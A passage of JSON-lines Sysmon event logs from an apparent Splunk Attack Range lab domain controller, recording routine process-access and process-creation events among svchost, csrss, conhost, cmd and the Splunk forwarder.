05:48:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3102,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3103,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3104,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3105,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3106,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010A21B0500}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010A21B0500}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3107,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.293\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-0010A21B0500}\r\nSourceProcessId: 4132\r\nSourceThreadId: 3384\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00102B1B0500}\r\nTargetProcessId: 4128\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.293","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-0010A21B0500}","SourceProcessId":"4132","SourceThreadId":"3384","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00102B1B0500}","TargetProcessId":"4128","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3108,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.310\r\nProcessGuid: {A837DB8D-0239-5F25-0000-0010C61C0500}\r\nProcessId: 2988\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-00102B1B0500}\r\nParentProcessId: 4128\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.310","ProcessGuid":"{A837DB8D-0239-5F25-0000-0010C61C0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-00102B1B0500}","ParentProcessId":"4128","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3109,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00102B1B0500}\r\nSourceProcessId: 4128\r\nSourceThreadId: 4124\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010C61C0500}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00102B1B0500}","SourceProcessId":"4128","SourceThreadId":"4124","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010C61C0500}","TargetProcessId":"2988","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3110,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010C61C0500}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010C61C0500}","TargetProcessId":"2988","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
